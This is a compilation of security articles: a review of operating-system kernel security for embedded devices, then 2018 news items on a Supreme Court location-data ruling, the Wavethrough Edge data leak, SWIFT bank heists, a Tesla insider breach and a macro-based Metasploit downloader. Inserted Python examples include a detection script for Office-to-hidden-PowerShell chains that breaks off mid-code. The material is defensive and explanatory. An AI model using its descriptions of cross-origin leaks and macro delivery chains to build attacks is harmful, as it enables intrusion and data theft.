Unlike in purely monolithic solutions, user processes in monolithic kernel systems are isolated from the kernel and only have access to its functions via a limited number of system calls. This constitutes a serious advantage from the information security standpoint.

A large number of services run in the kernel context, such as protocol implementations, file systems, device drivers, etc. Examples of monolithic kernel operating systems include those based on the Linux kernel (and its derivatives), as well as Windows, FreeBSD, RTEMS, etc.

The operating system’s kernel services still leave a large attack surface, while the code base operating in the kernel context cannot be considered as trusted. Therefore, don’t expect the kernel services to be free from vulnerabilities (in fact, vulnerabilities are regularly detected).

The compromise of any kernel service inevitably leads to the entire system being compromised, no matter what tools are employed to protect it.

The second problem is especially relevant for embedded systems: the need to restart the device when kernel modules are updated. Admittedly, restarting is not always required, but the cases where a restart can be avoided are the exception rather than the rule.

The main advantage of monolithic kernel architecture is its better performance as compared to microkernel operating systems. This is due to the smaller number of context switches.

Different Linux distributions
Operating systems based on the Linux kernel are very user-friendly: they are available in source code, offer excellent hardware support and have a large amount of application and system software. All this makes these operating systems extremely attractive for developers of embedded systems.

Note: Linux only serves as the kernel of an operating system. Full-fledged operating systems are Linux-based distributions.

It’s worth noting that Linux was developed as a kernel for a multi-user operating system and contains a set of built-in security mechanisms, but from a modern-day perspective it has a number of information security issues, both in terms of architecture and implementation.

Conventional wisdom suggests that a properly configured Linux-based solution is sufficiently secure. However, the actual configuration process is quite complicated and most security restrictions can be bypassed. Besides, there are also difficulties with Linux that are related to the implementation of secure boot mechanisms, updating operating system components, and a multitude of other problems.

A large number of Linux-based branches and distributions have been developed that aim to improve security. Extensions have also been developed to tackle information security issues, including AppArmour, GRSecurity, PAX, SELinux, etc. These extensions help improve the security posture, though they cannot guarantee sufficient security, because the code base of the Linux kernel is quite large, and there’s no way of making the kernel’s computing base trusted. This problem appears to be insurmountable. According to www.cvedetails.com, 453 vulnerabilities were detected in Linux kernels in 2017. That number includes 159 vulnerabilities that allow execution of arbitrary code in the kernel context. Exploitation of a vulnerability in the Linux kernel makes it possible to circumvent any protection mechanisms, even the most sophisticated and carefully configured.

Android
Android 8.0 Oreo is the latest version of the Android operating system for mobile devices and, according to the developers, contains a multitude of new information security mechanisms. The key security features in this operating system are aimed at mitigating the consequences of exploiting vulnerabilities and reducing the attack surface, as well as the use of the principle of least privilege. There have also been changes to the API design and to the architecture. Some of the innovations are described below:

Smart protection of app authorization.
Advanced verification during updates of applications and the operating system to prevent common types of attacks, including rollback.
In-built support of HSM (hardware security module).
Application sandboxing with support for seccomp filters (secure computing restricts apps’ ability to make system calls) and the WebView component is isolated.
Support for a set of encryption profiles (different profiles use different sets of keys).
In-built support for two-factor authentication using physical keys.
Complicating paths to apps. An app can no longer be found at its static location. Instead, it is installed each time to a new location, and a special call to the system must be made to gain access to the app.
Discontinued support of outdated and vulnerable protocols and algorithms, such as SSL v3.0.
These are all necessary and useful measures that substantially complicate post exploitation of vulnerabilities and the ability to gain root privileges.

However, it shouldn’t be forgotten that the Linux kernel is inside Android with all the drawbacks inherent to it. An analysis of the monthly security bulletins shows that new vulnerabilities are being discovered in Android all the time, and a significant portion of them enable execution of arbitrary code.

Microkernel operating systems
One possible solution to the above problems is the use of microkernel architecture.

A microkernel provides only the elementary functions of process management and a minimum set of hardware abstractions. Most of the work is done with the help of dedicated user processes that don’t run in the kernel’s address space. This helps to substantially reduce the attack surface of the kernel services, while the kernel of the operating system can be rigorously verified (thanks to the small code base) using, among other things, formal verification methods. To learn more about verification and how it is different from validation, check out Ekaterina Rudina’s article devoted to this topic.

The most meaningful results from an information security standpoint have been shown for microkernel architectures, for example, the Separation Kernel approach and the use of MILS architecture.

Different types of microkernels and microkernel operating systems are widely available on the market. Some examples from this category are QNX, INTEGRITY RTOS, Genode, the L4 kernel and its derivatives.

We would like to dwell a little bit on the microkernel L4. It’s the result of an evolutionary process in the microkernel approach to the development of operating systems. Today, L4 is effectively the de facto standard in the development of microkernel operating systems.

L4 microkernel family
The L4 kernel was initially developed to demonstrate the feasibility of creating a microkernel that is suitable for use in real-life, general-purpose operating systems. This attempt can be considered rather successful: there now exists a whole family of research and commercial projects that make use of the L4 derivatives. The kernels of this family have been ported on a large number of hardware platforms. It should be noted that solutions based on L4 support operation in hard real-time mode.

Among the microkernel implementations currently supported the following can be highlighted:

seL4 – the first microkernel to be formally verified. It is still undergoing active development.
Codezero – a commercial version of the L4 kernel. The source code of the kernel is available under the GPLv3 license, while the source of the additional modules and libraries is closed and distributed under commercial licenses.
Fiasco.OC – a version developed by TU Dresden and distributed under the GPLv2 license; commercial support is available.
For the listed kernels, different virtualization solutions are available. There are also other virtualization solutions based on the L4 microkernel that are worth mentioning: OKL4, NOVA and the PikeOS operating system.

The microkernels of the L4 family are also used in the following operating systems:

Genode
TUD:OS – an operating system developed by TU Dresden on the basis of L4Re, which is an L4-based framework for constructing solutions.
CAmkES – a component framework based on the L4 microkernel, developed by the Trustworthy Systems Research Group at Data61.
L4Linux – a port of the Linux kernel to an L4-family kernel. In this setup Linux runs as a user-mode service alongside other L4 applications (including real-time components). Linux kernel versions up to 4.14 and the x86 and ARM hardware platforms are supported.
From a security point of view, the seL4 kernel is the most important member of the L4 family.

The seL4 microkernel implements an object-capability model. It has been formally verified, meaning the operating system’s properties can be guaranteed within the stated concepts and assumptions; this improves the overall protection status of the solution. However, if the input assumptions do not hold, problems can arise. For instance, a substantial limitation of the formal model used in the seL4 verification is that it does not cover concurrent execution: it assumes a uniprocessor system in which the kernel runs with interrupts disabled.

The object-capability model provides detailed control over system behavior, but by no means all security properties can be described with its help. There are numerous other security models whose properties are impossible to express based on the object-capability model. For example, security properties may depend on system status, take time relationships into account, etc. To describe such properties, extra mechanisms need to be added to the solution, and in that case the advantages of seL4 are lost.

KasperskyOS makes use of many of the ideas used in seL4. However, it also allows for a description of any security properties by using Kaspersky Security System (KSS), part of the KasperskyOS architecture.

Hybrid operating systems
A hybrid kernel exhibits a combination of properties typical of monolithic and microkernel architectures; a hybrid kernel-based operating system architecture is essentially a modified microkernel that allows operating system modules to be executed in the kernel space to expedite operation.

Operating systems with hybrid kernels have emerged as a result of attempts to use the advantages of microkernel architecture while retaining as much of the well-tested monolithic kernel code as possible. In operating systems of this class, however, the problem of information security remains unsolved, because the attack surface remains large.

The ‘secure by design’ requirement
Many of the older operating systems were initially developed with no regard for information security. When security features are introduced, functional mechanisms cease to operate as they did before, and compatibility issues arise. For this reason, and a host of others, it’s impossible to completely revisit the architectures of these systems, and there can be no security guarantees – it’s only possible to talk of enhancing some security-related properties. There are many examples of such solutions, including QNX, Linux, and FreeBSD.

Only those operating systems that took information security requirements into consideration during development can ensure proper implementation of security mechanisms without impacting their functional capabilities. The use of a secure-by-design approach is a key requirement for the final solution to be certified to Common Criteria standard, starting with EAL4. Examples of secure-by-design operating systems are seL4, INTEGRITY RTOS, MUEN RTOS, KasperskyOS and several others.


From the very start, KasperskyOS was created to meet the most rigid information security requirements. It was based on advanced practices and approaches to creating secure systems, in line with the requirements of all essential security standards. In light of this, KasperskyOS can be considered a truly secure operating system from its inception.

KasperskyOS uses microkernel architecture in which the microkernel system tools divide the system into security domains, or ‘entities’ in KasperskyOS terms. All communications between security domains (inter-process communications, IPC) are performed using the microkernel – and controlled by it. No communications are allowed to bypass the microkernel.

All communications are typed: the interface of the entities is described in IDL (Interface Definition Language), and only this interface can be used for IPCs. This is where KasperskyOS differs significantly from most other operating systems.

The KasperskyOS microkernel operates in conjunction with Kaspersky Security System (KSS), which is a subsystem that calculates security verdicts. For each IPC, the KasperskyOS microkernel requests a verdict from KSS, which it uses as a basis for permitting or blocking that particular IPC. For verdict calculation, it is not only the fact and type of communication that is taken into account but also the system’s topology, the context in which the communication takes place, as well as the assigned policy described within the framework of a set of formal security models.

KSS supports a large number of formal security models, for example, Domain Type Enforcement, Object Capability, Role-Based Access, diverse temporal logic dialects, etc. New models can be added when required.

This provides the developer with a flexible tool to describe security policies with as high a level of detail as required. We are not aware of any other solution that provides this degree of detail.

Security policies are defined in a high-level language, which greatly simplifies the verification of the solution in accordance with stipulated requirements. This also makes it possible to run formal verification of the described properties[1].

If we consider systems with limited functional capabilities that perform a limited set of functions, theoretically it’s possible to provide the specified security properties and guarantee there are no vulnerabilities in the software code.

As a solution grows progressively more complex, the addition of different protocols, algorithms, functions, etc. makes it impossible to guarantee there are no vulnerabilities in it. Special measures must be taken to ensure these vulnerabilities cannot be exploited or that their exploitation does not lead to undesirable consequences. These protection measures should include isolation of processes, restricted access to resources, attack detection systems and countermeasures, etc. In that case, the security properties must be guaranteed by the system’s trusted components, i.e., by the OS kernel, security features, subsystems providing specific types of protection, such as cryptographic protection, etc.

At the same time, the relevant security policies need to be defined in an increasingly detailed way, and there comes a point where policy refinement reaches its limit. For example, capability-based policies can allow or deny access to a certain resource, but they cannot express that access is conditional on the system’s state or on what has happened earlier. In such cases the required security properties are treated as functional requirements and implemented in the solution’s code along with its other features. This leads to progressive growth of the code base that needs to be controlled, and ensuring its verifiability becomes an increasingly challenging task. Consequently, the solution again becomes insecure.
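The verdict-per-IPC scheme described above (typed interfaces, a type-enforcement policy, a verdict computed for every call), together with the kind of stateful rule that a plain capability list cannot express, as an added illustration written for this page. It is not KasperskyOS or KSS code and does not use their IDL or policy syntax; the entity names, methods and the download-verify-write rule are invented.

```python
"""Toy reference monitor: every call between security domains passes through
Monitor.request(), which returns a verdict.  Names and rules are invented."""
from dataclasses import dataclass

# "IDL": each entity exposes a fixed, named set of methods.  A call to a
# method that is not in the interface is not a valid IPC at all and is
# rejected before any policy is consulted.
INTERFACES = {
    "Network":  {"recv"},
    "Verifier": {"check"},
    "Storage":  {"write", "read"},
    "Updater":  set(),          # pure client, exposes nothing
}

# Domain Type Enforcement: (caller type, callee type, method) triples allowed.
DOMAIN_TYPE = {"Updater": "updater_t", "Network": "net_t",
               "Verifier": "verify_t", "Storage": "store_t"}
DTE_RULES = {
    ("updater_t", "net_t", "recv"),
    ("updater_t", "verify_t", "check"),
    ("updater_t", "store_t", "write"),
    ("updater_t", "store_t", "read"),
}


@dataclass
class Verdict:
    allowed: bool
    reason: str


class StatefulUpdatePolicy:
    """Temporal rule a capability list cannot state: a caller may write to
    Storage only if, since its last Network.recv, it has called
    Verifier.check; a successful write resets the cycle."""

    def __init__(self):
        self.state = {}  # caller -> "idle" | "downloaded" | "verified"

    def check(self, src, dst, method):
        st = self.state.get(src, "idle")
        if (dst, method) == ("Network", "recv"):
            return True, "downloaded"
        if (dst, method) == ("Verifier", "check"):
            return (True, "verified") if st == "downloaded" else (False, st)
        if (dst, method) == ("Storage", "write"):
            return (True, "idle") if st == "verified" else (False, st)
        return True, st          # other calls do not affect the cycle

    def commit(self, src, new_state):
        self.state[src] = new_state


class Monitor:
    """The only path between domains; nothing bypasses request()."""

    def __init__(self):
        self.temporal = StatefulUpdatePolicy()
        self.log = []            # (src, dst, method, allowed)

    def request(self, src, dst, method) -> Verdict:
        if dst not in INTERFACES or method not in INTERFACES[dst]:
            v = Verdict(False, "not in interface")
        elif (DOMAIN_TYPE.get(src), DOMAIN_TYPE.get(dst), method) not in DTE_RULES:
            v = Verdict(False, "dte")
        else:
            ok, new_state = self.temporal.check(src, dst, method)
            if ok:
                self.temporal.commit(src, new_state)  # state moves only on allow
                v = Verdict(True, "ok")
            else:
                v = Verdict(False, "temporal")
        self.log.append((src, dst, method, v.allowed))
        return v


def run_scenario(calls):
    """Feed a sequence of (src, dst, method) calls to a fresh monitor and
    return the list of verdicts."""
    m = Monitor()
    return [m.request(*c).allowed for c in calls]


if __name__ == "__main__":
    scenario = [
        ("Updater", "Storage", "write"),    # nothing verified yet: denied
        ("Updater", "Network", "recv"),
        ("Updater", "Storage", "write"),    # downloaded but unverified: denied
        ("Updater", "Verifier", "check"),
        ("Updater", "Storage", "write"),    # verified: allowed
        ("Updater", "Storage", "write"),    # cycle reset: denied again
    ]
    print(run_scenario(scenario))
```

The point of the structure is that the policy lives in the monitor, not in the Updater’s code: the Updater can be written without knowing the rule, and the rule can be verified on its own.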

With the help of KasperskyOS and KSS, it’s possible to provide as detailed a description of security properties as desired, and through decomposition of the solution it’s possible to select a limited set of individual modules containing the minimum required functions that require verification. These modules can be viewed as standalone and isolated – their verification then becomes easy.

The code base of KSS responsible for implementing the solution’s security policies can be generated, is formally verifiable[2] and, in this sense, it is trusted. This solves the problem of uncontrolled growth of the code base to which requirements of trust are imposed.

Since security properties are defined regardless of the functional logic, the developer can construct a security system for their solutions without taking into account the details of how specific components are implemented.

The described capabilities of KasperskyOS make it possible to follow a natural course of developing secure solutions that includes the following steps:

Threat analysis and threat modeling.
Development of a set of formal security policies to counter the threats described in step 1.
Decomposition of the solution into security domains, and definition of IPC interfaces in line with the data obtained at step 2.
Implementation of the solution in line with the data obtained at step 3, and configuration of security policies aligned with the results obtained at step 2.
The ability to follow the described process of development is an important methodological advantage over other operating systems. This ensures a key advantage of KasperskyOS: complex systems can be built to meet specific information security characteristics.

KasperskyOS supports virtualization with the help of the Kaspersky Secure Hypervisor (KSH) application. Its key feature is that it can work together with KSS to implement security policies related to the control of virtual machine access to the hypervisor’s internal resources. KSH is a lightweight solution. This makes it possible to verify its code base and means it can be viewed as being part of a trusted platform. The hypervisor can apply KSS verdicts to its internal processes even in situations where cross-domain interaction does not take place.

This capability does not exist in any other virtualization solutions; it is only possible to set rules to define how a specific virtual machine interacts with other isolated components of the system.

Conclusion
Now, in the internet-of-things era, cybersecurity issues surrounding connected devices are becoming increasingly critical. In our opinion, it is the security of the operating system that defines the overall level of cybersecurity of an entire embedded system. Unfortunately, issues of information security are still not given sufficient consideration during the development of operating systems. For nearly half of the operating systems we have considered, information security aspects are either not addressed whatsoever, or the functions associated with information security are implemented at a level that is unsatisfactory.

We hope that this review will, firstly, encourage the developers of operating systems for embedded systems to devote more attention to issues of cybersecurity, and, secondly, help developers choose an operating system for their projects. After all, it’s important for all of us that the internet of things doesn’t grow into an internet of threats.


Supreme Court of the US ruled that police need a warrant for mobile location data
24.6.2018 securityaffairs BigBrothers

The Supreme Court of the US ruled that police must obtain a search warrant before obtaining mobile location data from mobile carriers and similar services.
The Supreme Court of the United States ruled this week that law enforcement must obtain a search warrant before obtaining cell phone location information from mobile carriers or third-party services.

“When the government tracks the location of a cell phone it achieves near perfect surveillance, as if it had attached an ankle monitor to the phone’s user,” Chief Justice John Roberts wrote in the 5-4 opinion, as reported by The Wall Street Journal.

“Unlike the nosy neighbor who keeps an eye on comings and goings,” he wrote, the signal towers and processing centers that track cellphone users “are ever alert, and their memory is nearly infallible,” making the analog-era precedents that prosecutors cited to justify such warrantless searches all but obsolete.


The decision limits government surveillance and protects citizens’ privacy under the Fourth Amendment.

The Supreme Court ruled that a warrant is also needed to access location data stored by mobile carriers and similar companies; such data makes it possible to monitor almost every activity of a citizen.

“While individuals regularly leave their vehicles, they compulsively carry cell phones with them all the time. A cell phone faithfully follows its owner beyond public thoroughfares and into private residences, doctor’s offices, political headquarters, and other potentially revealing locales.” continues Chief Justice John Roberts.

“Critically, because location information is continually logged for all of the 400 million devices in the United States – not just those belonging to persons who might happen to come under investigation – this newfound tracking capacity runs against everyone.”

The authorities can still act without a warrant in emergencies that threaten life, or when handling national security matters.

The ruling came in the case of Timothy Carpenter v. United States, which dates back to 2011, when police arrested members of a gang that had committed armed robberies at several stores.

Gang members said the group was led by Timothy Carpenter; police checked this account by obtaining a court order for Carpenter’s cell phone location records and confirming that the suspect had been near the robberies.

Carpenter was sentenced to more than 100 years in prison, but lawyers for the American Civil Liberties Union, who represented him at the high court, called the decision “a truly historic vindication of privacy rights.”

The lawyers argued that a court order should not have been enough to obtain the suspect’s mobile location data, and that a search warrant should have been obtained instead.

The ruling was praised by privacy advocates because it defends citizens’ privacy against abuse.


Wavethrough CVE-2018-8235 flaw in Microsoft Edge leaks sensitive data
24.6.2018 securityaffairs
Vulnerability

A flaw in the Edge browser, dubbed Wavethrough, addressed by latest Microsoft Patch Tuesday for June 2018 could be exploited to read restricted data.
A bug in the Edge browser addressed by latest Microsoft Patch Tuesday for June 2018 could be exploited by attackers via malicious or compromised websites to read restricted data.

The flaw, tracked as CVE-2018-8235, was reported by Google developer Jake Archibald and is tied to the way the browser handles requests of different origins.

“A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins.” reads the security advisory published by Microsoft.

“The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.”

An attacker could exploit the vulnerability to force the browser to leak restricted data. The attack scenarios could involve maliciously crafted websites, compromised domains, or websites that accept or host content provided by the user or advertisements.

The flaw was dubbed Wavethrough because the issue occurs when a site uses a service worker to load multimedia content through the <audio> element, which relies on HTTP “range” requests.

“Browsers use this for resuming downloads, but it’s also used by media elements if the user seeks the media, so it can go straight to that point without downloading everything before it, or to pick up metadata if it’s one of those annoying media formats that has important metadata at the end of the file.” wrote Archibald.

“Unfortunately, via a service worker, that Range header was going missing (dun-dun-dunnnnnnnnn!). This is because media elements make what we call “no-cors” requests. Let’s push that onto the stack too”

In short, when the request passed through a service worker the Range header went missing, because media elements make “no-cors” requests.

“If you fetch() something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that.” continues the researcher.

“If you want to send fancy headers, the browser checks with the origin first, before making the request with the fancy headers. This is known as CORS.”

For requests carrying such headers, the browser first checks with the target origin (the CORS preflight); some APIs, however, do not go through CORS at all, and that is where sensitive data can leak.

A no-cors request is sent with the target origin’s cookies and yields an opaque response. Script cannot read that response directly, but some APIs still expose parts of it.

“Take <img> for instance. If you include an <img> that points to another origin, it’ll make a no-cors request to that origin using that origin’s cookies. If valid image data is returned, it’ll display on your site. Although you can’t access the pixel data of that image, data is still leaked through the width and height of the image. You also know whether or not you received valid image data.” the researcher explained.

“Let’s say there’s an image that’s only accessible if the user is logged into a particular site. An attacker can tell from the load/error event of the <img> whether that user is logged into that site. The user’s privacy has been compromised. Yaaaay.”
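The server side of the range requests and cookie-bearing no-cors fetches described above, as an added example written for this page (it is not code from Archibald’s post or Microsoft’s advisory). It shows what a media element gets back with and without a Range header, and it adds one response header the page does not mention: Cross-Origin-Resource-Policy, which browsers supporting it use to refuse cross-origin no-cors embedding of a resource, so an attacker page cannot point <img> or <audio> at it at all. That header narrows exposure; it is not a substitute for the browser fix. The resource, cookie name and sizes are invented.

```python
"""Minimal range-capable handler for a private resource.  Constructed example."""
import re

# Constructed stand-in for a private audio file (1000 bytes of 'A').
PRIVATE_AUDIO = b"\x41" * 1000

_RANGE_RE = re.compile(r"^bytes=(\d*)-(\d*)$")


def parse_range(header, size):
    """Return (start, end) for a single byte range, or None if the header is
    malformed or unsatisfiable.  The suffix form 'bytes=-N' (last N bytes) is
    handled; multi-range headers are deliberately not."""
    if not isinstance(header, str):
        return None
    m = _RANGE_RE.match(header.strip())
    if not m:
        return None
    s, e = m.groups()
    if s == "" and e == "":
        return None
    if s == "":                       # suffix range
        n = int(e)
        if n == 0:
            return None
        start, end = max(0, size - n), size - 1
    else:
        start = int(s)
        end = size - 1 if e == "" else min(int(e), size - 1)
    if start > end or start >= size:
        return None
    return start, end


def build_response(req_headers, body=PRIVATE_AUDIO):
    """req_headers: dict with lower-case header names.
    Returns (status, response_headers, body)."""
    headers = {
        "Content-Type": "audio/mpeg",
        "Accept-Ranges": "bytes",
        # Not on the page: browsers that implement this header drop a
        # no-cors response from another origin before <img>, <audio> or
        # Web Audio can observe anything about it.
        "Cross-Origin-Resource-Policy": "same-origin",
    }
    # The resource is private: the request must carry the session cookie.
    # That is exactly why a no-cors request made "with cookies" is dangerous.
    cookie = req_headers.get("cookie", "")
    if not re.search(r"(^|;\s*)session=valid(;|$)", cookie):
        return 401, headers, b""
    if "range" not in req_headers:
        # Range header absent (e.g. dropped on the way through a service
        # worker, as described above): the whole file comes back with 200.
        headers["Content-Length"] = str(len(body))
        return 200, headers, body
    r = parse_range(req_headers["range"], len(body))
    if r is None:
        headers["Content-Range"] = f"bytes */{len(body)}"
        return 416, headers, b""
    start, end = r
    chunk = body[start:end + 1]
    headers["Content-Range"] = f"bytes {start}-{end}/{len(body)}"
    headers["Content-Length"] = str(len(chunk))
    return 206, headers, chunk


if __name__ == "__main__":
    # Serve it locally to watch a browser's media element issue range requests.
    from http.server import BaseHTTPRequestHandler, HTTPServer

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            status, hdrs, body = build_response(
                {k.lower(): v for k, v in self.headers.items()})
            self.send_response(status)
            for k, v in hdrs.items():
                self.send_header(k, v)
            self.end_headers()
            self.wfile.write(body)

    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()
```

Run the file and request the resource with and without a `Range: bytes=0-3` header (and with and without the `session=valid` cookie) to see the 200/206/401/416 cases; the cookie check is what turns an otherwise harmless cross-origin load into an authenticated read.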

Using a specially crafted website, Archibald found that the beta and nightly builds of Firefox allowed the redirect and, as a result, exposed the duration of the requested audio. Mozilla had already patched that bug.

Edge was vulnerable as well, and it also let the resulting audio pass through the Web Audio API, so an attacker could observe the samples being played. Because the request is made with cookies, the attack revealed content that is otherwise accessible only to a logged-in user.

“It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing,” concluded the expert.


According to the experts, North Korea is behind the SWIFT attacks in Latin America
24.6.2018 securityaffairs APT Hacking

SWIFT hackers continue to target banks worldwide, the last string of attacks hit financial institutions across Latin America.
According to three people with knowledge of the matter cited by CyberScoop, the attacks were carried out by North Korea-linked APT groups, which also targeted other banks.

Recent attacks hit Mexico’s Bancomext and Chile’s Bank of Chile; in both cases the attackers used a variant of the dreaded KillDisk disk wiper to infect the banks’ systems and stole funds through the SWIFT payment system.

“North Korea was involved in both breaches, the sources said, adding that they were tied to others that haven’t yet been disclosed.” states Cyberscoop.

“Two sources reviewed inside information about the breach investigations, which are still ongoing. Confidential technical reports about the incidents are already being shared within private information sharing groups comprised of other financial institutions.”

Investigations of past breaches conducted by many security firms have repeatedly linked North Korea to attacks against SWIFT systems.

At the time of writing the attack vector is not clear, but experts believe the hackers targeted the banks with spear-phishing campaigns or used credentials obtained in other breaches.

Bancomext and Bank of Chile are not the only victims: the Mexican financial institution Banorte suffered a similar breach.

North Korea-linked hackers appear to be focusing on financial institutions in Latin America, Eastern Europe and Southeast Asia.

“SWIFT doesn’t comment on the attribution of cyberattacks – that is a question for law enforcement – but we can say that the cyber threat facing the financial community is fast increasing in terms of sophistication … [we’re unaware of] evidence that SWIFT’s own network or core messaging services have ever been compromised. Rather, in each of the incidents customers first suffered security breaches within their local environments.” reads a statement sent by a SWIFT spokesperson via email.

Once inside an organization, the hackers usually exploit weaknesses in the bank’s funds “transfer initiation environments” to steal credentials and make fraudulent, irrevocable transfers.

The attackers also used “diversionary smokescreens”: wiper malware deployed to hamper attribution and incident response.

“Shared malware variants between the multiple incidents, known as “MBR Killer” and “Bootwreck/killdisk,” caused systems to wipe boot data and other forensic records. The North Korean hackers have been seen using a combination of different wipers in their attacks.” added CyberScoop.

“The group who attacked the Mexican bank used both in their attack,” said Fernando Merces, a senior threat researcher with Trend Micro, an international cybersecurity firm. “There was also an MBR Killer used in a Taiwanese bank a few years ago … The financial sector sees these attacks most frequently. The attacks have been seen globally.”

The use of MBR Killer alone is not evidence of a specific threat actor’s involvement, because its code was posted to a cybercrime forum and has been reused by a wide range of actors.

In this case, forensic experts collected other indicators suggesting the involvement of the North Korea’s “Lazarus Group” in Latin America.

“CyberScoop obtained a confidential intelligence report, labelled “TLP: Amber,” authored May 29 by New York-based intelligence firm Flashpoint. That report further connected MBR Killer to the Chile case. The report states that this module had been “leveraged to hide the evidence of successful bank network penetrations.”” concludes CyberScoop.

Even if the attackers attempted to destroy any evidence, the analysis of TTPs allows attributing the attack to Pyongyang.

“Attackers often delete any evidence of fraudulent transactions on victim’s local system, but SWIFT can … [provide] the header data of the messages that SWIFT received from the impacted organization,” the SWIFT spokesperson added.

According to the Mexican financial news outlet El Financiero, hackers compromised Mexico’s interbank transfer system, the “Sistema de Pagos Electrónicos Interbancarios” (SPEI), using FALLCHILL, a RAT associated with North Korea-linked APT groups.


Tesla Breach: Malicious Insider Revenge or Whistleblowing?

23.6.2018 securityweek  Virus

Tesla Breach

Just before midnight last Sunday evening (June 17, 2018), Elon Musk sent an email to all staff. He was dismayed, he said, to learn about a Tesla employee "making direct code changes to the Tesla Manufacturing Operating System under false usernames and exporting large amounts of highly sensitive Tesla data to unknown third parties."

This was a textbook malicious insider attack -- but there may be more to it than meets the eye. The motive, according to Musk, was revenge: "he wanted a promotion that he did not receive." But the incident goes well beyond simple revenge sabotage, and includes the theft of sensitive data and its export to unknown outside parties.

The incident could have been triggered by revenge and aggravated by bribery; but until and unless those outside parties can be identified for certain, the true cause of the attack will remain speculative.

Musk himself is willing to speculate with insinuation. "As you know," he told employees, "there are a long list of organizations that want Tesla to die. These include Wall Street short-sellers, who have already lost billions of dollars and stand to lose a lot more." He then added oil and gas companies, who "rumor has it... are sometimes not super nice;" and the "big gas/diesel car company competitors [who already cheat on pollution levels, and] maybe they're willing to cheat in other ways?" The only potential risks he excluded were nation-states wishing to give their own nascent industries a technology boost, cyber criminals wishing to ransom Tesla or sell to competitors, and -- dare we say it -- whistleblowing.

Such is the nature of attribution for cybercrimes, it may never be known who -- if anyone outside of the malicious insider himself -- is really behind the incident. Sometimes it is only national intelligence agencies who know who did what on the internet through their much wider access to signals intelligence -- but those same agencies can equally feel that it is not in the national interest to get involved. If it was a foreign nation dabbling in IP theft, the intelligence agencies might go public. If it was a competitor or major national industry, the agencies might take the view that their role is not law enforcement.

In reality, the destination of the stolen data may already be known.

The attack itself seems to be typical insider work, using false usernames. We don't know whether those false usernames were existing accounts, or new accounts created by the attacker. In either case, however, it seems certain that the attacker enjoyed higher system privileges than were necessary.

“This," comments Joseph Carson, chief security scientist at Thycotic, "is a major reminder why privileged access management (PAM) is a must-have for organizations that deal with sensitive information or personal information -- and why least-privilege is a practice being adopted by many organizations."

It's a problem made more difficult, he suggests, because companies try to protect the privileged accounts they know about, which in most cases isn't effective. "Organizations continue to fail at the most important aspect of restricting privileged access, which is proactively discovering privileged accounts in the environment. It appears that Tesla have failed to do that most important step in least-privilege, which is discovering and detecting unapproved privileged access."

Since Musk's original disclosure of the breach by internal email on Sunday, matters have moved forward rapidly. On Wednesday, Tesla filed a complaint against the employee -- named as Martin Tripp -- in the Nevada District Court. This complaint admits that "Tesla has only begun to understand the full scope of Tripp’s illegal activity, but he has thus far admitted to writing software that hacked Tesla’s manufacturing operating system (“MOS”) and to transferring several gigabytes of Tesla data to outside entities."

Within a few months of Tripp joining Tesla, says the complaint, "his managers identified Tripp as having problems with job performance and at times being disruptive and combative with his colleagues. As a result of these and other issues, on or about May 17, 2018, Tripp was assigned to a new role. Tripp expressed anger that he was reassigned. Thereafter, Tripp retaliated against Tesla by stealing confidential and trade secret information and disclosing it to third parties, and by making false statements intended to harm the company."

But according to a report published today by the BBC, Tripp "says he’s a whistleblower being smeared for speaking out about standards and safety at the company, and deserves protection." The implication is that Tripp provided the documents used by Business Insider in its June 4 report; 'Internal documents reveal Tesla is blowing through an insane amount of raw material and cash to make Model 3s, and production is still a nightmare'.

The BBC also publishes extracts from a rapid-fire email exchange between Musk and Tripp that took place on Wednesday. At one point, Musk writes, "You should [be] ashamed of yourself for framing other people. You're a horrible human being." This is likely a reference to Tripp's hacking software being found on three other employees' computers. The legal complaint alleges, "His hacking software was operating on three separate computer systems of other individuals at Tesla so that the data would be exported even after he left the company and so that those individuals would be falsely implicated as guilty parties."

Tripp responded, "I NEVER 'framed' anyone else or even insinuated anyone else as being involved in my production of documents of your MILLIONS OF DOLLARS OF WASTE, Safety concerns, lying to investors/the WORLD. Putting cars on the road with safety issues is being a horrible human being!"

Whistleblowing is one possible reason for the data theft not mentioned by Musk in his June 17 email to staff, even though the Business Insider allegation mentions 'internal documents' and was published two weeks earlier. The full truth of what happened in this incident is likely to be exposed in court rather than via computer forensics.

However, in information security terms, an insider stole sensitive documents from Tesla. The motive is not as important as the act. It seems that Tesla does not operate adequate least-privilege measures, and does not have an internal traffic monitoring system capable of detecting and blocking the unsanctioned exfiltration of gigabytes of data. This failure has left Tesla with a PR nightmare that it must now manage.


New Encrypted Downloader Delivers Metasploit Backdoor
23.6.2018 securityweek 
Virus

A series of cyber-attacks targeting the Middle Eastern region use an encrypted downloader to deliver a Metasploit backdoor, AlienVault reports.

The attacks start with a malicious document containing parts of an article about the next Shanghai Cooperation Organization Summit, originally published at the end of May on a Middle Eastern news network.

The Office document contains malicious macro code designed to execute a Visual Basic script (stored as a hexadecimal stream) and launch a new task in a hidden PowerShell console. This stage serves a .NET downloader that uses a custom encryption method to obfuscate process memory and evade antivirus detection.

Dubbed GZipDe, the downloader appears to be based on a publicly available reverse-TCP payload to which the malware author added a new encryption layer.

“It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection,” AlienVault reveals.

A new memory page with execute, read and write permissions is created, and the decrypted payload is executed there. A handler that controls the process’s access to system resources ensures that only one instance of the malware runs at a time.
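Detection logic for the delivery chain just described (Office document, macro, script host, hidden PowerShell), as an added example written for this page rather than AlienVault’s code. It walks parent/child links in process-creation records shaped like Sysmon Event ID 1 and flags an Office process spawning a script host or shell, a shell anywhere beneath an Office process, and PowerShell started with a hidden window or an encoded command. The field names, the sample records and the base64 string are constructed for the example; no real indicator from the campaign is used.

```python
"""Flag Office -> script -> hidden PowerShell chains in process-creation
records.  Records and field names are constructed for this example."""
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
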